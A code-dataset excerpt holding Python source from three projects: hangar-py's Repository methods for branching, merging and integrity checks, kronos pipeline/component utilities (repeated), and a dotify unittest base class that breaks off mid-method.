:class:`Repository` exists at the specified directory,
the operation will fail.
Parameters
----------
user_name : str
Name of the person who will make commits to the repository. This
information is recorded permanently in the commit records.
user_email : str
Email address of the repository user. This information is recorded
permanently in any commits created.
remote_address : str
location where the
:class:`hangar.remote.server.HangarServer` process is
running and accessible by the clone user.
remove_old : bool, optional, kwarg only
DANGER! DEVELOPMENT USE ONLY! If enabled, a
:class:`hangar.repository.Repository` existing on disk at the same
path as the requested clone location will be completely removed and
replaced with the newly cloned repo. (the default is False, which
will not modify any contents on disk and which will refuse to create
a repository at a given location if one already exists there.)
Returns
-------
str
Name of the master branch for the newly cloned repository.
"""
self.init(user_name=user_name, user_email=user_email, remove_old=remove_old)
self._remote.add(name='origin', address=remote_address)
branch = self._remote.fetch(remote='origin', branch='master')
HEAD = heads.get_branch_head_commit(self._env.branchenv, branch_name=branch)
heads.set_branch_head_commit(self._env.branchenv, 'master', HEAD)
with warnings.catch_warnings(record=False):
warnings.simplefilter('ignore', category=UserWarning)
co = self.checkout(write=True, branch='master')
co.reset_staging_area()
co.close()
return 'master'
def init(self,
user_name: str,
user_email: str,
*,
remove_old: bool = False) -> str:
"""Initialize a Hangar repository at the specified directory path.
This function must be called before a checkout can be performed.
Parameters
----------
user_name : str
Name of the repository user account.
user_email : str
Email address of the repository user account.
remove_old : bool, kwarg-only
DEVELOPER USE ONLY -- remove and reinitialize a Hangar
repository at the given path, Default = False
Returns
-------
str
the full directory path where the Hangar repository was
initialized on disk.
"""
pth = self._env.init_repo(user_name=user_name,
user_email=user_email,
remove_old=remove_old)
return str(pth)
def log(self,
branch: str = None,
commit: str = None,
*,
return_contents: bool = False,
show_time: bool = False,
show_user: bool = False) -> Optional[dict]:
"""Displays a pretty printed commit log graph to the terminal.
.. note::
For programatic access, the return_contents value can be set to true
which will retrieve relevant commit specifications as dictionary
elements.
Parameters
----------
branch : str, optional
The name of the branch to start the log process from. (Default value
= None)
commit : str, optional
The commit hash to start the log process from. (Default value = None)
return_contents : bool, optional, kwarg only
If true, return the commit graph specifications in a dictionary
suitable for programatic access/evaluation.
show_time : bool, optional, kwarg only
If true and return_contents is False, show the time of each commit
on the printed log graph
show_user : bool, optional, kwarg only
If true and return_contents is False, show the committer of each
commit on the printed log graph
Returns
-------
Optional[dict]
Dict containing the commit ancestor graph, and all specifications.
"""
self.__verify_repo_initialized()
res = summarize.log(branchenv=self._env.branchenv,
refenv=self._env.refenv,
branch=branch,
commit=commit,
return_contents=return_contents,
show_time=show_time,
show_user=show_user)
return res
def summary(self, *, branch: str = '', commit: str = '') -> None:
"""Print a summary of the repository contents to the terminal
Parameters
----------
branch : str, optional
A specific branch name whose head commit will be used as the summary
point (Default value = '')
commit : str, optional
A specific commit hash which should be used as the summary point.
(Default value = '')
"""
self.__verify_repo_initialized()
ppbuf = summarize.summary(self._env, branch=branch, commit=commit)
print(ppbuf.getvalue())
return None
def _details(self, *, line_limit=100, line_length=100) -> None: # pragma: no cover
"""DEVELOPER USE ONLY: Dump some details about the underlying db structure to disk.
"""
print(summarize.details(
self._env.branchenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.refenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.hashenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.stageenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.stagehashenv, line_limit=line_limit, line_length=line_length).getvalue())
for commit, commitenv in self._env.cmtenv.items():
print(summarize.details(
commitenv, line_limit=line_limit, line_length=line_length).getvalue())
return
def _ecosystem_details(self) -> dict:
"""DEVELOPER USER ONLY: log and return package versions on the system.
"""
eco = ecosystem.get_versions()
return eco
def diff(self, master: str, dev: str) -> DiffAndConflicts:
"""Calculate diff between master and dev branch/commits.
Diff is calculated as if we are to merge "dev" into "master"
Parameters
----------
master: str
branch name or commit hash digest to use as the "master" which
changes made in "dev" are compared to.
dev: str
branch name or commit hash digest to use as the "dev"
(ie. "feature") branch which changes have been made to
which are to be compared to the contents of "master".
Returns
-------
DiffAndConflicts
Standard output diff structure.
"""
current_branches = self.list_branches()
# assert branch / commit specified by "master" exists and
# standardize into "digest" rather than "branch name" arg type
if master in current_branches:
masterHEAD = heads.get_branch_head_commit(
branchenv=self._env.branchenv, branch_name=master)
else:
cmtExists = commiting.check_commit_hash_in_history(
refenv=self._env.refenv, commit_hash=master)
if not cmtExists:
raise ValueError(f'`master` {master} is not valid branch/commit.')
masterHEAD = master
# same check & transform for "dev" branch/commit arg.
if dev in current_branches:
devHEAD = heads.get_branch_head_commit(
branchenv=self._env.branchenv, branch_name=dev)
else:
cmtExists = commiting.check_commit_hash_in_history(
refenv=self._env.refenv, commit_hash=dev)
if not cmtExists:
raise ValueError(f'`dev` {dev} is not valid branch/commit.')
devHEAD = dev
# create differ object and generate results...
diff = ReaderUserDiff(commit_hash=masterHEAD,
branchenv=self._env.branchenv,
refenv=self._env.refenv)
res = diff.commit(dev_commit_hash=devHEAD)
return res
def merge(self, message: str, master_branch: str, dev_branch: str) -> str:
"""Perform a merge of the changes made on two branches.
Parameters
----------
message: str
Commit message to use for this merge.
master_branch : str
name of the master branch to merge into
dev_branch : str
name of the dev/feature branch to merge
Returns
-------
str
Hash of the commit which is written if possible.
"""
self.__verify_repo_initialized()
commit_hash = select_merge_algorithm(
message=message,
branchenv=self._env.branchenv,
stageenv=self._env.stageenv,
refenv=self._env.refenv,
stagehashenv=self._env.stagehashenv,
master_branch=master_branch,
dev_branch=dev_branch,
repo_path=self._repo_path)
return commit_hash
def create_branch(self, name: str, base_commit: str = None) -> heads.BranchHead:
"""create a branch with the provided name from a certain commit.
If no base commit hash is specified, the current writer branch ``HEAD``
commit is used as the ``base_commit`` hash for the branch. Note that
creating a branch does not actually create a checkout object for
interaction with the data. to interact you must use the repository
checkout method to properly initialize a read (or write) enabled
checkout object.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
>>> repo.create_branch('testbranch')
BranchHead(name='testbranch', digest='b66b...a8cc')
>>> repo.list_branches()
['master', 'testbranch']
>>> co = repo.checkout(write=True, branch='testbranch')
>>> # add data ...
>>> newDigest = co.commit('added some stuff')
>>> repo.create_branch('new-changes', base_commit=newDigest)
BranchHead(name='new-changes', digest='35kd...3254')
>>> repo.list_branches()
['master', 'new-changes', 'testbranch']
Parameters
----------
name : str
name to assign to the new branch
base_commit : str, optional
commit hash to start the branch root at. if not specified, the
writer branch ``HEAD`` commit at the time of execution will be used,
defaults to None
Returns
-------
:class:`~.heads.BranchHead`
NamedTuple[str, str] with fields for ``name`` and ``digest`` of the
branch created (if the operation was successful)
Raises
------
ValueError
If the branch name provided contains characters outside of alpha-numeric
ascii characters and ".", "_", "-" (no whitespace), or is > 64 characters.
ValueError
If the branch already exists.
RuntimeError
If the repository does not have at-least one commit on the "default"
(ie. ``master``) branch.
"""
self.__verify_repo_initialized()
if (not is_ascii(name)) or (not is_suitable_user_key(name)):
err = ValueError(
f'Branch name provided: {name} invalid. Must contain only alpha-numeric '
f'or "." "_" "-" ascii characters. And be <= 64 Characters')
raise err from None
createdBranch = heads.create_branch(
branchenv=self._env.branchenv,
name=name,
base_commit=base_commit)
return createdBranch
def remove_branch(self, name: str, *, force_delete: bool = False) -> heads.BranchHead:
"""Permanently delete a branch pointer from the repository history.
Since a branch (by definition) is the name associated with the HEAD
commit of a historical path, the default behavior of this method is to
throw an exception (no-op) should the ``HEAD`` not be referenced as an
ancestor (or at least as a twin) of a separate branch which is
currently *ALIVE*. If referenced in another branch's history, we are
assured that all changes have been merged and recorded, and that this
pointer can be safely deleted without risk of damage to historical
provenance or (eventual) loss to garbage collection.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
>>> repo.create_branch('first-testbranch')
BranchHead(name='first-testbranch', digest='9785...56da')
>>> repo.create_branch('second-testbranch')
BranchHead(name='second-testbranch', digest='9785...56da')
>>> repo.list_branches()
['master', 'first-testbranch', 'second-testbranch']
>>> # Make a commit to advance a branch
>>> co = repo.checkout(write=True, branch='first-testbranch')
>>> # add data ...
>>> co.commit('added some stuff')
'3l253la5hna3k3a553256nak35hq5q534kq35532'
>>> co.close()
>>> repo.remove_branch('second-testbranch')
BranchHead(name='second-testbranch', digest='9785...56da')
A user may manually specify to delete an un-merged branch, in which
case the ``force_delete`` keyword-only argument should be set to
``True``.
>>> # check out master and try to remove 'first-testbranch'
>>> co = repo.checkout(write=True, branch='master')
>>> co.close()
>>> repo.remove_branch('first-testbranch')
Traceback (most recent call last):
...
RuntimeError: ("The branch first-testbranch is not fully merged. "
"If you are sure you want to delete it, re-run with "
"force-remove parameter set.")
>>> # Now set the `force_delete` parameter
>>> repo.remove_branch('first-testbranch', force_delete=True)
BranchHead(name='first-testbranch', digest='9785...56da')
It is important to note that *while this method will handle all safety
checks, argument validation, and performs the operation to permanently
delete a branch name/digest pointer, **no commit refs along the history
will be deleted from the Hangar database**.* Most of the history contains
commit refs which must be safe in other branch histories, and recent
commits may have been used as the base for some new history. As such, even
if some of the latest commits leading up to a deleted branch ``HEAD`` are
orphaned (unreachable), the records (and all data added in those commits)
will remain on the disk.
In the future, we intend to implement a garbage collector which will remove
orphan commits which have not been modified for some set amount of time
(probably on the order of a few months), but this is not implemented at the
moment.
Should an accidental forced branch deletion occur, *it is possible to
recover* and create a new branch head pointing to the same commit. If
the commit digest of the removed branch ``HEAD`` is known, its as simple as
specifying a name and the ``base_digest`` in the normal
:meth:`create_branch` method. If the digest is unknown, it will be a
bit more work, but some of the developer facing introspection tools /
routines could be used to either manually or (with minimal effort)
programmatically find the orphan commit candidates. If you find
yourself having accidentally deleted a branch, and must get it back,
please reach out on the `Github Issues
<https://github.com/tensorwerk/hangar-py/issues>`__ page. We'll gladly
explain more in depth and walk you through the process in any way we
can help!
Parameters
----------
name : str
name of the branch which should be deleted. This branch must exist, and
cannot refer to a remote tracked branch (ie. origin/devbranch), please
see exception descriptions for other parameters determining validity of
argument
force_delete : bool, optional
If True, remove the branch pointer even if the changes are un-merged in
other branch histories. May result in orphaned commits which may be
time-consuming to recover if needed, by default False
Returns
-------
:class:`~.heads.BranchHead`
NamedTuple[str, str] with fields for `name` and `digest` of the branch
pointer deleted.
Raises
------
ValueError
If a branch with the provided name does not exist locally
PermissionError
If removal of the branch would result in a repository with zero local
branches.
PermissionError
If a write enabled checkout is holding the writer-lock at time of this
call.
PermissionError
If the branch to be removed was the last used in a write-enabled
checkout, and whose contents form the base of the staging area.
RuntimeError
If the branch has not been fully merged into other branch histories,
and ``force_delete`` option is not ``True``.
"""
self.__verify_repo_initialized()
res = heads.remove_branch(branchenv=self._env.branchenv,
refenv=self._env.refenv,
name=name,
force_delete=force_delete)
return res
def list_branches(self) -> List[str]:
"""list all branch names created in the repository.
Returns
-------
List[str]
the branch names recorded in the repository
"""
self.__verify_repo_initialized()
branches = heads.get_branch_names(self._env.branchenv)
return branches
def verify_repo_integrity(self) -> bool:
"""Verify the integrity of the repository data on disk.
Runs a full cryptographic verification of repository contents in order
to ensure the integrity of all data and history recorded on disk.
.. note::
This proof may take a significant amount of time to run for
repositories which:
1. store significant quantities of data on disk.
2. have a very large number of commits in their history.
As a brief explanation for why these are the driving factors behind
processing time:
1. Every single piece of data in the repositories history must be read
from disk, cryptographically hashed, and compared to the expected
value. There is no exception to this rule; regardless of when a piece
of data was added / removed from an column, or for how many (or how
few) commits some sample exists in. The integrity of the commit tree at
any point after some piece of data is added to the repo can only be
validated if it - and all earlier data pieces - are proven to be intact
and unchanged.
Note: This does not mean that the verification is repeatedly
performed for every commit some piece of data is stored in. Each
data piece is read from disk and verified only once, regardless of
how many commits some piece of data is referenced in.
2. Each commit reference (defining names / contents of a commit) must be
decompressed and parsed into a usable data structure. We scan across
all data digests referenced in the commit and ensure that the
corresponding data piece is known to hangar (and validated as
unchanged). The commit refs (along with the corresponding user records,
message, and parent map), are then re-serialized and cryptographically
hashed for comparison to the expected value. While this process is
fairly efficient for a single commit, it must be repeated for each
commit in the repository history, and may take a non-trivial amount of
time for repositories with thousands of commits.
While the two points above are the most time consuming operations,
there are many more checks which are performed alongside them as part
of the full verification run.
Returns
-------
bool
True if integrity verification is successful, otherwise False; in
this case, a message describing the offending component will be
printed to stdout.
"""
self.__verify_repo_initialized()
heads.acquire_writer_lock(self._env.branchenv, 'VERIFY_PROCESS')
try:
integrity.run_verification(
branchenv=self._env.branchenv,
hashenv=self._env.hashenv,
refenv=self._env.refenv,
repo_path=self._env.repo_path)
finally:
heads.release_writer_lock(self._env.branchenv, 'VERIFY_PROCESS')
return True
def force_release_writer_lock(self) -> bool:
"""Force release the lock left behind by an unclosed writer-checkout
.. warning::
*NEVER USE THIS METHOD IF WRITER PROCESS IS CURRENTLY ACTIVE.* At the time
of writing, the implications of improper/malicious use of this are not
understood, and there is a a risk of of undefined behavior or (potentially)
data corruption.
At the moment, the responsibility to close a write-enabled checkout is
placed entirely on the user. If the `close()` method is not called
before the program terminates, a new checkout with write=True will fail.
The lock can only be released via a call to this method.
.. note::
This entire mechanism is subject to review/replacement in the future.
Returns
-------
bool
if the operation was successful.
"""
self.__verify_repo_initialized()
forceReleaseSentinal = parsing.repo_writer_lock_force_release_sentinal()
success = heads.release_writer_lock(self._env.branchenv, forceReleaseSentinal)
return success
| pt | 0.178182 | 2.30898 | 2 |
kronos/utils.py | jtaghiyar/kronos | 17 | 13525 | '''
Created on Apr 16, 2014
@author: jtaghiyar
'''
import os
import subprocess as sub
from plumber import Plumber
from job_manager import LocalJobManager
from workflow_manager import WorkFlow
from helpers import trim, make_dir, export_to_environ
class ComponentAbstract(object):
"""
component template.
"""
def __init__(self, component_name, component_parent_dir=None, seed_dir_name=None):
'''
initialize general attributes that each component must have.
'''
## export component parent directory to the PYTHONPATH env var
if component_parent_dir is not None:
export_to_environ(component_parent_dir, 'PYTHONPATH')
## import modules of the component, i.e. component_reqs and component_params.
## if component_parent_dir==None, then components directory must have been exported to
## the PYTHONPATH env var beforehand.
list_of_modules = ['component_' + x for x in['reqs', 'params']]
m = __import__(component_name, globals(), locals(), list_of_modules, -1)
if component_parent_dir is None:
component_parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(m.__file__)))
if seed_dir_name is None:
seed_dir_name = 'component_seed'
## The component_ui is NOT imported, since all the input arguments should be passed to
## the component_main from config file via updating self.args attribute that happens in
## the corresponding task of the component. Therefore, an empty namespace is initialized
## here.
import argparse
parser = argparse.ArgumentParser()
args, _ = parser.parse_known_args()
# args.__dict__['return_value'] = None
## general attribute
self.component_name = component_name
self.component_dir = component_parent_dir
self.seed_dir = os.path.join(self.component_dir, component_name, seed_dir_name)
## modules and args
self.args = args
self._modules = m
self.component_reqs = self._modules.component_reqs
self.component_params = self._modules.component_params
## from the component_reqs
self.env_vars = self.component_reqs.env_vars
self.memory = self.component_reqs.memory
self.parallel = self.component_reqs.parallel
self.requirements = self.component_reqs.requirements.copy()
self.seed_version = self.component_reqs.seed_version
self.version = self.component_reqs.version
def run(self):
"""run component via system command line locally."""
cmd, cmd_args = self.make_cmd()
ljm = LocalJobManager()
ljm.run_job(cmd, cmd_args, self.component_name)
def focus(self, cmd, cmd_args, chunk):
"update the cmd and cmd_args for each chunk."
raise NotImplementedError("focus method called before implementation")
return cmd, cmd_args
def make_cmd(self, chunk=None):
"""make a command."""
cmd = None
cmd_args = None
raise NotImplementedError("make_cmd method called before implementation")
return cmd, cmd_args
def test(self):
"""run unittest of the component."""
raise NotImplementedError("test method called before implementation")
class Task(object):
"""
Wrap one component for the following purposes:
1. to update the args passed to the component via command line.
2. to update the requirements of the component given in the config file.
3. to give access to the 'input_files', 'output_files',
'input_params', 'return_values' and 'input_arguments' of the component.
"""
def __init__(self, task_name, component):
self.task_name = task_name
self.component = component
def update_comp_args(self, **kwargs):
"""Update self.component.args, i.e. overwrite argument specified vi command line.
This can help pass the previous task's results to the parameters
of the current task.
"""
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
if kwargs is not None:
kwargs = trim(kwargs, '__pipeline__')
args_dict.update(kwargs)
def update_comp_reqs(self, reqs_dict):
"""Update self.component.requirements dictionary if there are new
values given in the config file, or keep the default otherwise.
"""
## do not update the default value of a requirement
## if it is not changed in the config file
## or it is not one of the requirements of the components
d = {k:v for k,v in reqs_dict.iteritems()
if v is not None and k in self.component.requirements.keys()}
self.component.requirements.update(d)
def update_comp_env_vars(self, env_vars):
"""update the environment variables with values from the config file."""
if not self.component.env_vars:
self.component.env_vars = env_vars
else:
self.component.env_vars.update(env_vars)
def update_comp_output_filenames(self, prefix, working_dir=None, no_prefix=False):
"""update the output file names by prepending the prefix to their names."""
output_file_params = self.component.component_params.output_files.keys()
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
wd = os.getcwd()
if working_dir:
os.chdir(working_dir)
for param in output_file_params:
value = args_dict.get(param)
if value is not None:
dirname = os.path.dirname(value)
self._make_dirs(dirname)
## prepend filenames with the given prefix
old_filename = os.path.basename(value)
if old_filename:
if no_prefix:
new_filename = old_filename
else:
new_filename = '_'.join([prefix, old_filename])
args_dict[param] = os.path.join(dirname, new_filename)
else:
args_dict[param] = dirname
os.chdir(wd)
def _make_dirs(self, path):
"""make dirs using os.makedirs"""
if not path:
return
try:
os.makedirs(path)
except OSError as e:
if e.strerror == 'File exists':
pass
else:
raise
class Pipeline(object):
'''
a pipeline could be composed of one or more ruffus task
that can be run as an independent entity provided that proper input/output
arguments are passed to it.
'''
def __init__(self, pipeline_name, config_file, script_dir=os.getcwd(), sample_id=None):
self.pipeline_name = pipeline_name
self.config_file = config_file
self.script_dir = script_dir
self.sample_id = sample_id
make_dir(self.script_dir)
## path to where the resultant pipeline script is written
self.pipeline_script = os.path.join(self.script_dir, self.pipeline_name+'.py')
## use the WorkFlow to parse/make the config file
self.wf = WorkFlow(config_file)
## holds the starting point of the sub pipeline, key:tag value:task_object
self.start_task = {}
## holds the end point of the sub pipeline, key:tag value:task_object
self.stop_task = {}
## list of all the inputs to the pipeline, i.e. set of the inputs of
## all the root tasks. A dict with k:input_params and v:input_arguments
self.inputs = {}
def make_script(self, sample_id):
"""run the plumber and make a python script for the pipeline."""
with open(self.pipeline_script, 'w') as ps:
plumber = Plumber(ps, self.wf)
plumber.make_script(sample_id)
def run(self):
try:
##TODO: this part is incomplete
## Technically, a pipeline is a script, and we run the
## script here using a LocalJobManager
cmd = 'python {}'.format(self.pipeline_script)
proc = sub.Popen(cmd, shell=True)
cmdout, cmderr = proc.communicate()
print cmdout, cmderr
# ljm = LocalJobManager(logs_dir, results_dir)
# ljm.run_job(cmd=cmd)
except KeyboardInterrupt:
print 'KeyboardInterruption in main'
self.kill()
raise
def kill(self):
"""kill all the jobs."""
pass
def add_component(self, component_name, component_parent_dir):
pass
def add_task(self, task_name, component):
"""add task object to the list of tasks."""
task = Task(task_name, component)
self.tasks[task_name] = task
def get_inputs(self):
"""get the list of all input file parameters of all the root
components in the pipeline.
"""
return self.tasks['root'].input_files
def update_pipeline_script_args(self, args_namespace):
"""update args namespace of the pipeline script."""
## change the Namespace object to dictionary
args_dict = vars(args_namespace)
##TODO: make proper dictionary from the values that
## needs to be passed to the pipeline script
kwargs = None
args_dict.update(kwargs)
def update_components_args(self):
"""update all the arguments of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_args()
method over each of the components in the pipeline.
"""
pass
def update_components_reqs(self):
"""update all the requirements of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_reqs()
method over each of the components in the pipeline.
"""
pass
def import_python_modules(self):
"""import required python modules for the pipeline to run."""
pass
def import_factory_modules(self):
"""import required factory modules for the pipeline to run."""
pass
def set_start_task(self, task_name):
self.start_task = self.tasks[task_name]
def set_stop_task(self, task_name):
self.stop_task = self.tasks[task_name]
| '''
Created on Apr 16, 2014
@author: jtaghiyar
'''
import os
import subprocess as sub
from plumber import Plumber
from job_manager import LocalJobManager
from workflow_manager import WorkFlow
from helpers import trim, make_dir, export_to_environ
class ComponentAbstract(object):
"""
component template.
"""
def __init__(self, component_name, component_parent_dir=None, seed_dir_name=None):
'''
initialize general attributes that each component must have.
'''
## export component parent directory to the PYTHONPATH env var
if component_parent_dir is not None:
export_to_environ(component_parent_dir, 'PYTHONPATH')
## import modules of the component, i.e. component_reqs and component_params.
## if component_parent_dir==None, then components directory must have been exported to
## the PYTHONPATH env var beforehand.
list_of_modules = ['component_' + x for x in['reqs', 'params']]
m = __import__(component_name, globals(), locals(), list_of_modules, -1)
if component_parent_dir is None:
component_parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(m.__file__)))
if seed_dir_name is None:
seed_dir_name = 'component_seed'
## The component_ui is NOT imported, since all the input arguments should be passed to
## the component_main from config file via updating self.args attribute that happens in
## the corresponding task of the component. Therefore, an empty namespace is initialized
## here.
import argparse
parser = argparse.ArgumentParser()
args, _ = parser.parse_known_args()
# args.__dict__['return_value'] = None
## general attribute
self.component_name = component_name
self.component_dir = component_parent_dir
self.seed_dir = os.path.join(self.component_dir, component_name, seed_dir_name)
## modules and args
self.args = args
self._modules = m
self.component_reqs = self._modules.component_reqs
self.component_params = self._modules.component_params
## from the component_reqs
self.env_vars = self.component_reqs.env_vars
self.memory = self.component_reqs.memory
self.parallel = self.component_reqs.parallel
self.requirements = self.component_reqs.requirements.copy()
self.seed_version = self.component_reqs.seed_version
self.version = self.component_reqs.version
def run(self):
"""run component via system command line locally."""
cmd, cmd_args = self.make_cmd()
ljm = LocalJobManager()
ljm.run_job(cmd, cmd_args, self.component_name)
def focus(self, cmd, cmd_args, chunk):
"update the cmd and cmd_args for each chunk."
raise NotImplementedError("focus method called before implementation")
return cmd, cmd_args
def make_cmd(self, chunk=None):
"""make a command."""
cmd = None
cmd_args = None
raise NotImplementedError("make_cmd method called before implementation")
return cmd, cmd_args
def test(self):
"""run unittest of the component."""
raise NotImplementedError("test method called before implementation")
class Task(object):
"""
Wrap one component for the following purposes:
1. to update the args passed to the component via command line.
2. to update the requirements of the component given in the config file.
3. to give access to the 'input_files', 'output_files',
'input_params', 'return_values' and 'input_arguments' of the component.
"""
def __init__(self, task_name, component):
self.task_name = task_name
self.component = component
def update_comp_args(self, **kwargs):
"""Update self.component.args, i.e. overwrite argument specified vi command line.
This can help pass the previous task's results to the parameters
of the current task.
"""
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
if kwargs is not None:
kwargs = trim(kwargs, '__pipeline__')
args_dict.update(kwargs)
def update_comp_reqs(self, reqs_dict):
"""Update self.component.requirements dictionary if there are new
values given in the config file, or keep the default otherwise.
"""
## do not update the default value of a requirement
## if it is not changed in the config file
## or it is not one of the requirements of the components
d = {k:v for k,v in reqs_dict.iteritems()
if v is not None and k in self.component.requirements.keys()}
self.component.requirements.update(d)
def update_comp_env_vars(self, env_vars):
"""update the environment variables with values from the config file."""
if not self.component.env_vars:
self.component.env_vars = env_vars
else:
self.component.env_vars.update(env_vars)
def update_comp_output_filenames(self, prefix, working_dir=None, no_prefix=False):
"""update the output file names by prepending the prefix to their names."""
output_file_params = self.component.component_params.output_files.keys()
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
wd = os.getcwd()
if working_dir:
os.chdir(working_dir)
for param in output_file_params:
value = args_dict.get(param)
if value is not None:
dirname = os.path.dirname(value)
self._make_dirs(dirname)
## prepend filenames with the given prefix
old_filename = os.path.basename(value)
if old_filename:
if no_prefix:
new_filename = old_filename
else:
new_filename = '_'.join([prefix, old_filename])
args_dict[param] = os.path.join(dirname, new_filename)
else:
args_dict[param] = dirname
os.chdir(wd)
def _make_dirs(self, path):
"""make dirs using os.makedirs"""
if not path:
return
try:
os.makedirs(path)
except OSError as e:
if e.strerror == 'File exists':
pass
else:
raise
class Pipeline(object):
'''
a pipeline could be composed of one or more ruffus task
that can be run as an independent entity provided that proper input/output
arguments are passed to it.
'''
def __init__(self, pipeline_name, config_file, script_dir=os.getcwd(), sample_id=None):
self.pipeline_name = pipeline_name
self.config_file = config_file
self.script_dir = script_dir
self.sample_id = sample_id
make_dir(self.script_dir)
## path to where the resultant pipeline script is written
self.pipeline_script = os.path.join(self.script_dir, self.pipeline_name+'.py')
## use the WorkFlow to parse/make the config file
self.wf = WorkFlow(config_file)
## holds the starting point of the sub pipeline, key:tag value:task_object
self.start_task = {}
## holds the end point of the sub pipeline, key:tag value:task_object
self.stop_task = {}
## list of all the inputs to the pipeline, i.e. set of the inputs of
## all the root tasks. A dict with k:input_params and v:input_arguments
self.inputs = {}
def make_script(self, sample_id):
"""run the plumber and make a python script for the pipeline."""
with open(self.pipeline_script, 'w') as ps:
plumber = Plumber(ps, self.wf)
plumber.make_script(sample_id)
def run(self):
try:
##TODO: this part is incomplete
## Technically, a pipeline is a script, and we run the
## script here using a LocalJobManager
cmd = 'python {}'.format(self.pipeline_script)
proc = sub.Popen(cmd, shell=True)
cmdout, cmderr = proc.communicate()
print cmdout, cmderr
# ljm = LocalJobManager(logs_dir, results_dir)
# ljm.run_job(cmd=cmd)
except KeyboardInterrupt:
print 'KeyboardInterruption in main'
self.kill()
raise
def kill(self):
"""kill all the jobs."""
pass
def add_component(self, component_name, component_parent_dir):
pass
def add_task(self, task_name, component):
"""add task object to the list of tasks."""
task = Task(task_name, component)
self.tasks[task_name] = task
def get_inputs(self):
"""get the list of all input file parameters of all the root
components in the pipeline.
"""
return self.tasks['root'].input_files
def update_pipeline_script_args(self, args_namespace):
"""update args namespace of the pipeline script."""
## change the Namespace object to dictionary
args_dict = vars(args_namespace)
##TODO: make proper dictionary from the values that
## needs to be passed to the pipeline script
kwargs = None
args_dict.update(kwargs)
def update_components_args(self):
"""update all the arguments of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_args()
method over each of the components in the pipeline.
"""
pass
def update_components_reqs(self):
"""update all the requirements of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_reqs()
method over each of the components in the pipeline.
"""
pass
def import_python_modules(self):
"""import required python modules for the pipeline to run."""
pass
def import_factory_modules(self):
"""import required factory modules for the pipeline to run."""
pass
def set_start_task(self, task_name):
self.start_task = self.tasks[task_name]
def set_stop_task(self, task_name):
self.stop_task = self.tasks[task_name]
| pt | 0.198522 | 2.274987 | 2 |
tests/base.py | the-dotify-project/dotify | 3 | 13526 | from pathlib import Path
from re import sub
from shutil import rmtree
from unittest import TestCase
from dotify import Dotify, models
class BaseNameResolverMixin(object):
@classmethod
def get_download_basename(cls, obj):
if isinstance(obj, models.Track):
return cls.get_download_basename_track(obj)
elif isinstance(obj, models.Playlist):
return cls.get_download_basename_playlist(obj)
elif isinstance(obj, models.Album):
return cls.get_download_basename_album(obj)
raise RuntimeError("`{0}` is an instance of {1}".format(obj, type(obj)))
@classmethod
def get_download_basename_track(cls, track):
artist, name = track.artist.name, track.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", "_", artist), sub(r"\s+", "_", name)
return "{0} - {1}.mp3".format(artist, name)
@classmethod
def get_download_basename_playlist(cls, playlist):
return sub(r"\s+", " ", playlist.name.strip())
@classmethod
def get_download_basename_album(cls, album):
artist, name = album.artist.name, album.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", " ", artist), sub(r"\s+", " ", name)
return "{0} - {1}".format(artist, name)
class DotifyBaseTestCase(TestCase, BaseNameResolverMixin):
def setUp(self):
self.client = Dotify()
self.test_directory = Path(__file__).parent / "tmp"
self.test_directory.mkdir(parents=True, exist_ok=True)
def tearDown(self):
rmtree(self.test_directory)
def download(self, cls_name, url):
with self.client:
model_type = getattr(models, cls_name)
obj = model_type.from_url(url)
download_basename = self.get_download_basename(obj)
download_fullpath = self.test_directory / download_basename
obj.download(download_fullpath)
self.assertTrue(download_fullpath.exists())
def search(self, cls_name, query, metadata_list, limit=1):
with self.client:
self.assertEqual(len(metadata_list), limit)
results = getattr(models, cls_name).search(query, limit=limit)
for result, metadata in zip(results, metadata_list):
for name, value in metadata.items():
self._test_search_result_metadata_equality(result, name, value)
@classmethod
def get_value(cls, obj, attribute_path):
return cls._get_value_recursive(
obj,
list(filter(None, attribute_path.split("."))),
)
@classmethod
def _get_value_recursive(cls, obj, paths):
if paths:
return cls._get_value_recursive(getattr(obj, paths[0]), paths[1:])
return obj
def _test_search_result_metadata_equality(self, result, name, value):
with self.subTest("Asserting metadata equality", **{name: value}):
self.assertEqual(self.get_value(result, name), value)
| from pathlib import Path
from re import sub
from shutil import rmtree
from unittest import TestCase
from dotify import Dotify, models
class BaseNameResolverMixin(object):
@classmethod
def get_download_basename(cls, obj):
if isinstance(obj, models.Track):
return cls.get_download_basename_track(obj)
elif isinstance(obj, models.Playlist):
return cls.get_download_basename_playlist(obj)
elif isinstance(obj, models.Album):
return cls.get_download_basename_album(obj)
raise RuntimeError("`{0}` is an instance of {1}".format(obj, type(obj)))
@classmethod
def get_download_basename_track(cls, track):
artist, name = track.artist.name, track.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", "_", artist), sub(r"\s+", "_", name)
return "{0} - {1}.mp3".format(artist, name)
@classmethod
def get_download_basename_playlist(cls, playlist):
return sub(r"\s+", " ", playlist.name.strip())
@classmethod
def get_download_basename_album(cls, album):
artist, name = album.artist.name, album.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", " ", artist), sub(r"\s+", " ", name)
return "{0} - {1}".format(artist, name)
class DotifyBaseTestCase(TestCase, BaseNameResolverMixin):
def setUp(self):
self.client = Dotify()
self.test_directory = Path(__file__).parent / "tmp"
self.test_directory.mkdir(parents=True, exist_ok=True)
def tearDown(self):
rmtree(self.test_directory)
def download(self, cls_name, url):
with self.client:
model_type = getattr(models, cls_name)
obj = model_type.from_url(url)
download_basename = self.get_download_basename(obj)
